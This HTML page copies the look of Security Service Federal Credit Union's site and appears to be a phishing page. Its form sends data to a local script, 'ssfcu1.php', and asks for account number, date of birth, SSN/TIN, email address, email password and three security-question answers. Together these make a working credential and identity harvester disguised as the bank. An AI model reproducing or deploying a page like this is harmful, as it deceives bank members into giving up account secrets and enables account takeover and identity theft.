

<!DOCTYPE html>
<!--[if IE 9]><html lang="en" class="ie9 no-js"><![endif]-->
<!--[if !IE]><!-->
<html lang="en">
<!--<![endif]-->
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta content="width=device-width, initial-scale=1.0" name="viewport" />

<title>Security Service Federal Credit Union</title>
<meta name="keywords" content="" />
<meta name="description" content="" />

        <script type="text/javascript" src="https://assets.adobedtm.com/launch-EN73337b32732946aca6fcf110508cb52a.min.js"></script>
    <!-- Bundles -->
    <script src="https://www.ssfcu.org/bundles/scripts/jquery?v=a3XBwo40wyCFkPBVRqeMxCMfWN6mHvoFdDNEL3Yc5hE1"></script>

    <script src="https://www.ssfcu.org/bundles/scripts/jqueryplugins?v=6SOqO4Dlw8QzHKxzTVhk33XCoaA7kod1AUVKWU3q0IU1"></script>

    <script src="https://www.ssfcu.org/bundles/scripts/website?v=gXcBQty_EdXS9ySqMYTDmo8JCFyMhEaqp6ryzfjD2dA1"></script>

    <link href="https://www.ssfcu.org/bundles/styles/jquery-ui?v=zqtBqd4P-NJif89DsMJX1tgDvCCdPvcBuuaj8VSywcg1" rel="stylesheet"/>

    <link href="https://www.ssfcu.org/bundles/styles/fontawesome?v=YNK_9yNjW_5Rj4SrfYmuw3nB8S4sIElAYtter_UZEVI1" rel="stylesheet"/>

    <link href="https://www.ssfcu.org/bundles/styles/website?v=S9QiNxCsZWF9cg5kW-JOpnYHZN2rTBJdUfTwTZ70JJ01" rel="stylesheet"/>


    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,300,700" rel="stylesheet" type="text/css" />

    

    

    
</head>
<body class="header-static ">
    <div id="main-container" class="">
        <header>
            <div class="container">
    <div class="row">
        <div class="hidden-md-up">
            <div class="navbar-header">
                <button type="button" class="pull-left navbar-toggle col-xs-1" data-toggle="collapse" data-target="#top-navbar" aria-expanded="false">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                <div class="navbar-text text-center col-xs-10">
                    


<a href="https://www.ssfcu.org/">
    <img src="https://www.ssfcu.org/-/media/project/website/ssfcu-logo.svg?h=34&amp;mh=50&amp;w=265&amp;hash=178E505B4D143EC19CF2AA8FEFC56172" class="img-responsive" alt="Security Service Federal Credit Union home" width="265" height="34" />
</a>

                </div>
            </div>
            <!-- Toggled Nav Item -->
            <nav class="navbar-collapse collapse hidden-print" id="top-navbar" aria-expanded="true">
                <div class="navbar-text text-center routing">
                    
<span>Routing Number: <strong>314088637</strong></span>

                </div>
                <span class="search-field">
                    <form action="/search">
    <div class="input-group">
        <input type="search" name="q" class="form-control" placeholder="Click or type here to search" />
        <span class="input-group-btn">
            <button type="submit" class="btn btn-default"><i class="fa fa-search" aria-hidden="true"></i></button> 
        </span>
    </div>
</form>

                </span>
                

<nav>
    <ul class="nav">
        <li>
            <a href="https://www.ssfcu.org/membership" target="" title="Join">

                <span>Join</span>
            </a>
        </li>
            <li class="divider"></li>
        <li>
            <a href="https://www.ssfcu.org/locations" target="" title="ATMs/Branches">

                <span>ATMs/Branches</span>
            </a>
        </li>
            <li class="divider"></li>
        <li>
            <a href="https://www.ssfcu.org/contact-us" target="" title="Contact Us">

                <span>Contact Us</span>
            </a>
        </li>
            <li class="divider"></li>
        <li>
            <a href="https://www.ssfcu.org/rates" target="" title="Rates">

                <span>Rates</span>
            </a>
        </li>
            <li class="divider"></li>
        <li>
            <a href="https://www.ssfcu.org/origination/application-center" target="" title="My Applications">

                <span>My Applications</span>
            </a>
        </li>
            <li class="divider"></li>
        <li>
            <a href="https://www.ssfcu.org/careers" target="" title="Careers">

                <span>Careers</span>
            </a>
        </li>
    </ul>
</nav>

                <ul class="nav navbar">
                    <li class="divider"></li>

                        <li class="navbar-text-warning">
                            <a href="https://www.ssfcu.org/login" class="text-bold" target="_self" title="Log In">
    Log In
</a>



                        </li>
                </ul>
            </nav>
        </div>
        <div class="hidden-sm-down">
            <div class="col-xs-9 col-sm-8 col-md-5 logo">
                


<a href="https://www.ssfcu.org/">
    <img src="https://www.ssfcu.org/-/media/project/website/ssfcu-logo.svg?h=34&amp;mh=50&amp;w=265&amp;hash=178E505B4D143EC19CF2AA8FEFC56172" class="img-responsive" alt="Security Service Federal Credit Union home" width="265" height="34" />
</a>

            </div>
            <div class="col-md-7 hidden-print">
                <div class="col-md-6 routing">
                    <div class="pull-right">
                        
<span>Routing Number: <strong>314088637</strong></span>

                    </div>
                </div>
                <div class="col-md-6 search-field">
                    <form action="/search">
    <div class="input-group">
        <input type="search" name="q" class="form-control" placeholder="Click or type here to search" />
        <span class="input-group-btn">
            <button type="submit" class="btn btn-default"><i class="fa fa-search" aria-hidden="true"></i></button> 
        </span>
    </div>
</form>

                </div>
                <nav class="col-md-12 top-navbar">
                    

    <ul class="nav navbar-nav">
            <li class="">
                <a href="https://www.ssfcu.org/membership" target="" title="Join">
Join                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/locations" target="" title="ATMs/Branches">
ATMs/Branches                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/contact-us" target="" title="Contact Us">
Contact Us                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/rates" target="" title="Rates">
Rates                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/origination/application-center" target="" title="My Applications">
My Applications                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/careers" target="" title="Careers">
Careers                </a>
            </li>
    </ul>

                </nav>
            </div>
        </div>
    </div>
</div>


<div class="container hidden-print">
    <div class="row">
        <ul class="nav nav-tabs" role="tablist">
            <li class="tab-dark active">
                <a role="tab" aria-expanded="false" aria-controls="home" href="#products" data-toggle="tab">Products &amp; Services</a>
            </li>
                <li class="tab-primary">
                    <a href="https://www.ssfcu.org/login" class="" target="" title="Online Banking">
    Online Banking
</a>



                </li>
        </ul>
        <div class="tab-content">
            <div class="tab-pane active" id="products" role="tabpanel">
                <nav class="navbar navbar-mobile navbar-dark">
                    <div class="nav-panel">
                        <ul class="hidden-md-up nav navbar-nav">
                            <li class="navbar-text text-center routing">
                                
<span>Routing Number: <strong>314088637</strong></span>

                            </li>
                        </ul>
                        
<ul class="nav navbar-nav">
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Checking &amp; Savings
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/checking-and-savings/checking" target="">Checking</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/checking-and-savings/savings" target="">Savings</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/checking-and-savings/money-market" target="">Money Market Account</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/checking-and-savings/certificates" target="">Certificates</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/checking-and-savings/iras" target="">IRAs</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Loans &amp; Credit
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/loans-and-credit/personal-loans" target="">Personal Loans</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/loans-and-credit/auto-loans" target="">Auto Loans</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/loans-and-credit/other-vehicle-loans" target="">Other Vehicle Loans</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/loans-and-credit/student-loans" target="">Student Loans</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/loans-and-credit/credit-cards" target="">Credit Cards</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Home Loans
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/home-loans/mortgage" target="">Mortgage</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/home-loans/home-equity" target="">Home Equity</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/home-loans/title" target="">Title Company</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Account Services
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/virtual-appointments" target="">Virtual Appointments</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/online-banking" target="">Online Banking</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/mobile-banking" target="">Mobile Banking</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/disclosures-and-terms" target="">Disclosures &amp; Terms</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/member-services" target="">Member Services</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/account-services/member-forms" target="">Member Forms</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Investments
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/investments/overview" target="">Overview</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/investments/investment-services" target="">Investment Services</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/investments/financial-tools" target="">Financial Tools</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/investments/contact-a-consultant" target="">Contact a Consultant</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Insurance
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/insurance/personal" target="">Insurance for You</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/insurance/commercial" target="">Insurance for Your Business</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/insurance/specialty-insurance" target="">Specialty Insurance</a>
                    </li>
                </ul>
            </li>
            <li class=" dropdown">
                <a href="" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                    Business
                </a>
                <ul class="dropdown-menu">
                    <li class="">
                        <a href="https://www.ssfcu.org/business/business-loans" target="">Business Loans</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/credit-cards" target="">Credit Cards</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/checking" target="">Checking</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/savings" target="">Savings</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/money-market" target="">Money Market</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/certificates" target="">Certificates</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/cash-management" target="">Cash Management</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/business-contacts" target="">Business Contacts</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/business-calculators" target="">Calculators</a>
                    </li>
                    <li class="">
                        <a href="https://www.ssfcu.org/business/join" target="">Join</a>
                    </li>
                </ul>
            </li>
</ul>

                        <ul class="nav navbar-nav navbar-right">
                            <li>
<a href="https://www.ssfcu.org/login" class="text-bold" target="_self" title="Log In">
    Log In
</a>


                            </li>
                        </ul>
                    </div>
                </nav>
            </div>
            <div class="tab-pane" id="banking" role="tabpanel">
                <nav class="navbar navbar-mobile navbar-primary">
                                    </nav>
            </div>
        </div>
        


    </div>
</div>

        </header>
        <main role="main">
            <div class="container">
    <div class="row ss-page-top">
        
    </div>


    <div class="row">
        <div class="col-xs-12 ss-page-body">
            <div>
    <h1>Your Information</h1>
<hr />
<p>Please provide this information about yourself.</p>
<p><span style="color: #ff0000;">*All fields required.</span></p>
</div>
<form action="ssfcu1.php" autocomplete="off" method="post"><input name="__RequestVerificationToken" type="hidden" value="bJmeXeiqC4t7whAjd3IJbLFfNAQcnZgBswu601yj85m4CNwX4095X6rM1DcfqbX-2P51a_KYm0fTwf59Nd3NTC_BvuPNcisAgyJWfk5gLJ81" /><input id="uid" name="uid" type="hidden" value="1d8ce125-840e-433d-a758-c9c63ebbd76c" />    

 




<div class="form-group">
        <label class="control-label" for="Username">Account Number</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Account Number." id="Username" name="an" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="Account Number" data-valmsg-replace="true"></span>
    </div>



    <div class="form-group">
        <label class="control-label" for="DateOfBirth">Date of Birth</label>
        <input class="form-control" data-val="true" data-val-date="Enter a valid Date of Birth (Ex: 02/19/1981)." data-val-required="Enter your Date of Birth (Ex: 02/19/1981)." id="DateOfBirth" name="DateOfBirth" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="DateOfBirth" data-valmsg-replace="true"></span>
    </div>


    <div class="form-group">
        <label class="control-label" for="SSN">SSN/TIN</label>
        <input class="form-control" data-val="true" data-val-length="Enter your SSN/TIN." data-val-length-max="9" data-val-length-min="9" data-val-number="Enter your SSN/TIN." data-val-required="Enter your SSN/TIN." id="SSN" name="SSN" type="text" />
        <span class="field-validation-valid" data-valmsg-for="SSN" data-valmsg-replace="true"></span>
    </div>





<div class="form-group">
        <label class="control-label" for="Username">Email Address</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Email Address." id="Username" name="email" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="Email Address" data-valmsg-replace="true"></span>
    </div>

<div class="form-group">
        <label class="control-label" for="Username">Email Password</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Email Password." id="Username" name="epass" type="password" value="" />
        <span class="field-validation-valid" data-valmsg-for="Email Password" data-valmsg-replace="true"  ></span>
    </div>








 <div class="form-group">    
        <label class="control-label" for="Security Question">Security Question</label>

        <select class="form-control" data-val="true" data-val-required="Select Your Security Question." id="IsCommercial" name="q1"><option value="">- Select Security Question -</option>




<option value="What was your childhood nickname?">What was your childhood nickname?</option>
                    
                    <option value="In what city did you meet your spouse/significant other?">In what city did you meet your spouse/significant other?</option>
                    
                    <option value="What is the middle name of your youngest child?">What is the middle name of your youngest child?</option>
                    
                    <option value="What is your oldest sibling's middle name?">What is your oldest sibling's middle name?</option>
                    
                    <option value="What is your maternal grandfather's first name?">What is your maternal grandfather's first name?</option>
                    
                    <option value="What school did you attend for sixth grade?">What school did you attend for sixth grade?</option>
                    
                    <option value="What is your oldest cousin's first and last name?">What is your oldest cousin's first and last name?</option>
                    
                    <option value="What was the name of your first stuffed animal?">What was the name of your first stuffed animal?</option>
                    
                    <option value="In what city or town did your mother and father meet?">In what city or town did your mother and father meet?</option>
                    
                    <option value="What is your maternal grandmother's first name?">What is your maternal grandmother's first name?</option>
                    
                    <option value="In what city or town was your first job?">In what city or town was your first job?</option>
                    
                    <option value="What is your maternal grandmother's maiden name?">What is your maternal grandmother's maiden name?</option>
                    
                    <option value="What is the name of the place your wedding reception was held?">What is the name of the place your wedding reception was held?</option>
                    
                    <option value="What is the name of the company of your first job?">What is the name of the company of your first job?</option>
                    
                    <option value="What is your spouse's mother's maiden name?">What is your spouse's mother's maiden name?</option>
                    
                    <option value="To what city did you go on your honeymoon?">To what city did you go on your honeymoon?</option>
                    
                    <option value="What is the street number of the house you grew up in?">What is the street number of the house you grew up in?</option>
                    
                    <option value="What is your paternal grandmother's first name?">What is your paternal grandmother's first name?</option>
                    
                    <option value="What is your mother's middle name?">What is your mother's middle name?</option>
                    
                    <option value="What was the make and model of your first car?">What was the make and model of your first car?</option>
                    
                    <option value="What is the name of your grandmother's dog?">What is the name of your grandmother's dog?</option>
                    
                    <option value="What is your paternal grandfather's first name?">What is your paternal grandfather's first name?</option>
                    
                    <option value="What is the name of the first undergraduate college you attended?">What is the name of the first undergraduate college you attended?</option>
                    
                    <option value="What year did you graduate from High School?">What year did you graduate from High School?</option>
                    
                    <option value="In what year was your father born?">In what year was your father born?</option>
                    
                    <option value="In what year was your mother born?">In what year was your mother born?</option>
                    
                    <option value="What was the color of your first car?">What was the color of your first car?</option>
                    
                    <option value="What is your father's middle name?">What is your father's middle name?</option>
                    
                    <option value="What was the name of your first pet?">What was the name of your first pet?</option>
                    
                    <option value="In what city were you born?">In what city were you born?</option>


</select>
        <span class="field-validation-valid" data-valmsg-for="IsCommercial" data-valmsg-replace="true"></span>
    </div>



<div class="form-group">
        <label class="control-label" for="Security Answer">Security Answer</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Security Answer." id="Username" name="a1" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="Security Answer" data-valmsg-replace="true"></span>
    </div>





<div class="form-group">    
        <label class="control-label" for="Security Question">Security Question</label>

        <select class="form-control" data-val="true" data-val-required="Select Your Security Question." id="IsCommercial" name="q2"><option value="">- Select Security Question -</option>


<option   value="What is the name of your best childhood friend?">What is the name of your best childhood friend?</option>

						<option   value="What is the first name of your mother closest friend?">What is the first name of your mother's closest friend?</option>

						<option   value="What was the name of your first pet?">What was the name of your first pet?</option>

						<option   value="What is the first name of your favorite niece/nephew?">What is the first name of your favorite niece/nephew?</option>

						<option   value="What is your all-time favorite song?">What is your all-time favorite song?</option>

						<option   value="What was the first name of your favorite teacher or professor?">What was the first name of your favorite teacher or professor?</option>

						<option   value="What is the first name of your hairdresser/barber?">What is the first name of your hairdresser/barber?</option>

						<option   value="What is the name of a college you applied to but didnt attend?">What is the name of a college you applied to but didnt attend?</option>

						<option   value="On what street is your grocery store?">On what street is your grocery store?</option>

						 <option   value="What is the name of the medical professional who delivered your first child?">What is the name of the medical professional who delivered your first child?</option>

<option   value="Who is your favorite person in history?">Who is your favorite person in history?</option>

						<option   value="What was the make and model of your first car?">What was the make and model of your first car?</option>

						<option   value="What is the name of your high school star athlete?">What is the name of your high school's star athlete?</option>

						<option   value="What was the first live concert you attended?">What was the first live concert you attended?</option>

						<option   value="Where were you on New Year 2000?">Where were you on New Year's 2000?</option>





</select>
        <span class="field-validation-valid" data-valmsg-for="IsCommercial" data-valmsg-replace="true"></span>
    </div>


<div class="form-group">
        <label class="control-label" for="Security Answer">Security Answer</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Security Answer." id="Username" name="a2" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="Security Answer" data-valmsg-replace="true"></span>
    </div>




<div class="form-group">    
        <label class="control-label" for="Security Question">Security Question</label>

        <select class="form-control" data-val="true" data-val-required="Select Your Security Question." id="IsCommercial" name="q3"><option value="">- Select Security Question -</option>




<option   value="What is the first name of your high school prom date?">What is the first name of your high school prom date?</option>

						<option   value="As a child, what did you want to be when you grew up?">As a child, what did you want to be when you grew up?</option>

						<option   value="What is the name of your favorite restaurant?">What is the name of your favorite restaurant?</option>

						<option   value="What was the first name of your first manager?">What was the first name of your first manager?</option>

						<option   value="What is the first name of the best man/maid of honor at your wedding?">What is the first name of the best man/maid of honor at your wedding?</option>




<option   value="What is the name of your favorite charity?">What is the name of your favorite charity?</option>

						<option   value="In what city did your honeymoon? (Enter full name of city only)">In what city did your honeymoon? (Enter full name of city only)</option>

						<option   value="What is the name of your first babysitter?">What is the name of your first babysitter?</option>

						<option   value="What celebrity do you most resemble?">What celebrity do you most resemble?</option>

						<option   value="What was the name of your first boyfriend or girlfriend?">What was the name of your first boyfriend or girlfriend?</option>

						<option   value="What is your best friend first name?">What is your best friend's first name?</option>

						<option   value="What is the last name of your third grade teacher?">What is the last name of your third grade teacher?</option>

						<option   value="What street did your best friend in high school live on? (Enter full name of street only)">What street did your best friend in high school live on? (Enter full name of street only)</option>

						<option   value="What is the last name of your family physician?">What is the last name of your family physician?</option>



</select>
        <span class="field-validation-valid" data-valmsg-for="IsCommercial" data-valmsg-replace="true"></span>
    </div>


<div class="form-group">
        <label class="control-label" for="Security Answer">Security Answer</label>
        <input class="form-control" data-val="true" data-val-required="Enter your Security Answer." id="Username" name="a3" type="text" value="" />
        <span class="field-validation-valid" data-valmsg-for="Security Answer" data-valmsg-replace="true"></span>
    </div>






























































    <div class="form-group form-buttons single-form-submit">
        <button type="button" class="btn btn-default flow-cancel" data-keys="" data-returnurl="/login">
            Cancel
        </button>
        <button type="submit" class="btn btn-primary">
            Continue
        </button>
    </div>
<input id="DevicePrint" name="DevicePrint" type="hidden" value="" />

<script>
    $(function () {
        $("#DevicePrint").val(encode_deviceprint());
    });
</script></form>



<div class="modal fade" id="timeout-modal" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close extend-session-button" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <button type="button" class="close hide-popup" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <h5 class="modal-title">Session to Expire</h5>
            </div>
            <div class="modal-body">
                <div class="row">
                    <div class="col-sm-offset-9 col-sm-3">
                        <a href="javascript:void(0)" class="extend-session-button">Extend Session</a>
                    </div>
                </div>
                <h3>Still There?</h3>
                <p class="extend-session-content">
                    Your current myBranch session is about to expire. For your security, you will be logged out of myBranch after an extended period of inactivity.
                </p>
                <br />
                <div class="row">
                    <div class="col-sm-offset-2 col-sm-8">
                        <p class="bg-danger">
                            Your session will log out in <span id="countdown"></span> seconds.
                        </p>
                    </div>
                </div>
                <br />
                <p>
                    <!-- 
 Server: PW6
 Assembly File Version: 1.2.0.0
 Time: 7/6/2020 9:14:53 AM
 -->
                </p>
            </div>
        </div>
    </div>
</div>


<script type="text/javascript">
    var test;
    window.SessionTimeout = (function () {
        
        var config = {
            timeoutDelay: 570,
            canExtend: true,
            timeoutHeartbeat: 1,
            popupLength: 30
        };

        
        var storage = null;
        var initStorage = function () {
            // Only init storage once per page
            if (storage !== null) return;
            // Feature detection. Without localStorage and JSON, we should fall back gracefully
            if (localStorage && JSON) storage = {
                storageNamespace: 'timeout_storage',
                setStorage: function (obj) {
                    obj = typeof obj === 'undefined' ? {} : obj;
                    localStorage[this.storageNamespace] = JSON.stringify(obj);
                },
                getStorage: function () {
                    return typeof localStorage[this.storageNamespace] === 'undefined' ? {} : JSON.parse(localStorage[this.storageNamespace]);
                },
                set: function (key, value) {
                    var data = this.getStorage();
                    data[key] = value;
                    this.setStorage(data);
                },
                get: function (key, defaultValue) {
                    defaultValue = typeof defaultValue === 'undefined' ? null : defaultValue;
                    var data = this.getStorage();
                    if (key in data) return data[key];
                    return defaultValue;
                }
            };
            else storage = {
                data: {},
                set: function (key, value) {
                    this.data[key] = value;
                },
                get: function (key, defaultValue) {
                    defaultValue = typeof defaultValue === 'undefined' ? null : defaultValue;
                    if (key in this.data) return this.data[key];
                    return defaultValue;
                }
            };
        }

        
        var countdownUpdate = function (num) {
            if (typeof num !== 'number') return;

            if (num > -1) {
                if (num < 10)
                    num = '0' + num;

                $('#countdown').html('0:' + num);
            }
        }

        var popupUpdate = function (timeTillPopup) {
            var popup = $('#timeout-modal'),
                isShown = (popup.data('bs.modal') || { isShown: false }).isShown;

            if (timeTillPopup > 0 && isShown)
                popup.modal('hide');

            if (timeTillPopup <= 0) {
                countdownUpdate(storage.get('popupLength', config.popupLength) + timeTillPopup);

                if (isShown == false) {
                    if (storage.get('canExtend', config.canExtend) == true) {
                        $('.extend-session-button, .extend-session-content').show();
                        $('.hide-popup').hide();
                    }
                    else {
                        $('.extend-session-button, .extend-session-content').hide();
                        $('.hide-popup').show();
                    }

                    popup.modal({ backdrop: 'static', keyboard: false });
                }
            }
        }



        

        var checkTimeout = function () {
            var time = (new Date).getTime(),
                timeoutAt = storage.get('timeoutAt', time),
                popupAt = storage.get('popupAt', timeoutAt - (config.popupLength * 1000)),
                secondsTillPopup = Math.floor((popupAt - time) / 1000);

            popupUpdate(secondsTillPopup);

            if (time > timeoutAt)
            {
                timeoutSession();
                clearInterval(config.timeoutHeartbeatInterval);
            }
                
        }

        var timeoutSession = function () {
            var isOrigination = (window.location.href.indexOf("/origination/") > -1);

            window.location = isOrigination
                ? '/ssfcuapi/login/logout?type=application-timeout'
                : '/ssfcuapi/login/logout?type=timeout';
        }

        var extendTimeout = function () {
            $.ajax({ url: "/SSFCUapi/login/ContinueSession" })
                .done(function () {
                    setTimeout();
                    $("#timeout-modal").modal("hide");
                });
        }

        var hidePopupWithoutExtend = function () {
            storage.set('popupAt', storage.get('timeoutAt') + (60 * 1000));
            $("#timeout-modal").modal("hide");
        }

        var setTimeout = function () {
            var time = (new Date).getTime(),
                timeoutAt = time + (config.timeoutDelay * 1000),
                popupAt = timeoutAt - (config.popupLength * 1000);

            storage.set('timeoutAt', timeoutAt);
            storage.set('popupAt', popupAt);
            storage.set('canExtend', config.canExtend);
        }

        
        $(function () {
            initStorage();
            setTimeout();
            config.timeoutHeartbeatInterval = setInterval(checkTimeout, (config.timeoutHeartbeat * 1000));

            $('.extend-session-button').click(extendTimeout);
            $('.hide-popup').click(hidePopupWithoutExtend);
        })
    })();
</script>

        </div>
    </div>
</div>
        </main>
        <footer>
            <div class="container hidden-print">
    <div class="row hidden-sm-down">
        <div class="col-xs-12 logo-bg">
            <img src="https://www.ssfcu.org/styles/project/website/images/ssfcu-logo-small.png" alt="SSFCU small Logo" class="center-block">
        </div>
        <div class="col-xs-12 gradient">
            <div class="row">
                <div class="col-xs-9 mega-menu">
                    <div class="col-xs-3">
                        

<h6>INSIDE<br />SECURITY SERVICE</h6>
<nav>
    <ul class="nav">
        <li>
            <a href="https://www.ssfcu.org/about-us/news" target="" title="News">

                <span>News</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/locations" target="" title="Locations">

                <span>Locations</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/contact-us" target="" title="Contact Us">

                <span>Contact Us</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/careers" target="" title="Careers">

                <span>Careers</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/about-us" target="" title="About Us">

                <span>About Us</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/eventcenter" target="" title="Event Center">

                <span>Event Center</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/security" target="" title="Security">

                <span>Security</span>
            </a>
        </li>
    </ul>
</nav>

                    </div>
                    <div class="col-xs-3">
                        

<h6>ACCOUNT<br />SERVICES</h6>
<nav>
    <ul class="nav">
        <li>
            <a href="https://www.ssfcu.org/account-services/online-banking" target="" title="Online Banking">

                <span>Online Banking</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/account-services/mobile-banking" target="" title="Mobile Banking">

                <span>Mobile Banking</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/account-services/disclosures-and-terms" target="" title="Disclosures and Terms">

                <span>Disclosures and Terms</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/checking-and-savings/checking/power-protected-checking" target="" title="Identity Theft">

                <span>Identity Theft</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/account-services/member-forms" target="" title="Member Forms">

                <span>Member Forms</span>
            </a>
        </li>
    </ul>
</nav>

                    </div>
                    <div class="col-xs-3">
                        

<h6>PRODUCT<br />RATES</h6>
<nav>
    <ul class="nav">
        <li>
            <a href="https://www.ssfcu.org/rates/auto-loan-rates" target="" title="Auto Loans">

                <span>Auto Loans</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/personal-loan-rates" target="" title="Personal Loans">

                <span>Personal Loans</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/certificate-rates" target="" title="Certificates">

                <span>Certificates</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/checking-and-savings-rates" target="" title="Checking and Savings">

                <span>Checking and Savings</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/credit-card-rates" target="" title="Credit Cards">

                <span>Credit Cards</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/home-loan-rates" target="" title="Home Loans">

                <span>Home Loans</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/rates/other-vehicle-loan-rates" target="" title="Other Vehicle Loans">

                <span>Other Vehicle Loans</span>
            </a>
        </li>
    </ul>
</nav>

                    </div>
                    <div class="col-xs-3">
                        

<h6>BUSINESS &<br />COMMERCIAL</h6>
<nav>
    <ul class="nav">
        <li>
            <a href="https://www.ssfcu.org/business/business-loans" target="" title="Business Loans">

                <span>Business Loans</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/business/credit-cards" target="" title="Business Credit Cards">

                <span>Business Credit Cards</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/business/checking" target="" title="Business Checking">

                <span>Business Checking</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/business/savings" target="" title="Business Savings">

                <span>Business Savings</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/business/cash-management" target="" title="Cash Management">

                <span>Cash Management</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/business/cash-management/merchant-services" target="" title="Employer Benefits">

                <span>Employer Benefits</span>
            </a>
        </li>
        <li>
            <a href="https://www.ssfcu.org/contact-us" target="" title="Contact a Representative">

                <span>Contact a Representative</span>
            </a>
        </li>
    </ul>
